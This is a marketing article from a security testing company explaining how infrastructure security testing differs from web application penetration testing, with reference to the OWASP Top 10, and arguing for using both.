While both infrastructure and web application security testing aim to find security gaps or vulnerabilities in an organisations assets, it’s important to be aware of how different they are. But in what ways do they differ and do you need both?
What is infrastructure security testing?
An infrastructure security test is primarily concerned with the evaluation of the computers, integrations, and systems that make up the organisation’s network. With the age of digital transformation and the day-to-day running of businesses being increasingly contained within a computer system; the integrity and security of these networks are paramount.
There are a number of services that can be offered, these include internal and external attacks, social engineering, phishing, network configuration, and threat response. The ultimate aim of this type of testing is to make recommendations on network changes and user training to improve network security and to provide greater protection for the organisation as a whole from malicious attackers.
How is web application security testing different?
There is undoubtedly some cross-over between web application and infrastructure security testing. Web application penetration testing is intended to reveal flaws in the security mechanisms of a web application, such as a website and its associated dependencies and to ensure that it protects data and maintains functionality as intended. A security assessment allows you to identify these potentially vulnerable areas and harden against these possible attack vectors.
At Zoonou, our penetration testing service has been designed to provide a sweeping coverage of the Open Web Application Security Project (OWASP) Top 10, an industry recognised list of the most critical security risks and exploits found in web applications. Some of these risks, such as ‘component with known vulnerabilities’, or ‘security misconfiguration’, may also be picked up within an infrastructure security test but a web application penetration test can reveal flaws within the functionality of the application itself. For example, a malicious user may be able to gain an advantage within a competition or a game or inject a script to their user-profile that could be run unbeknownst by other service users.
Web applications are never made equal; if the same organisation has built multiple applications then each one would need to be tested separately. Different services, integrations, and functionality are present in every application.
What is the right approach?
Cybersecurity should not be considered as a nice-to-have but as a priority. Infrastructure security should be at the core of your cybersecurity programme however if you own or develop a web application you need to adopt a combined approach to ensure the integrity and coverage of your digital assets.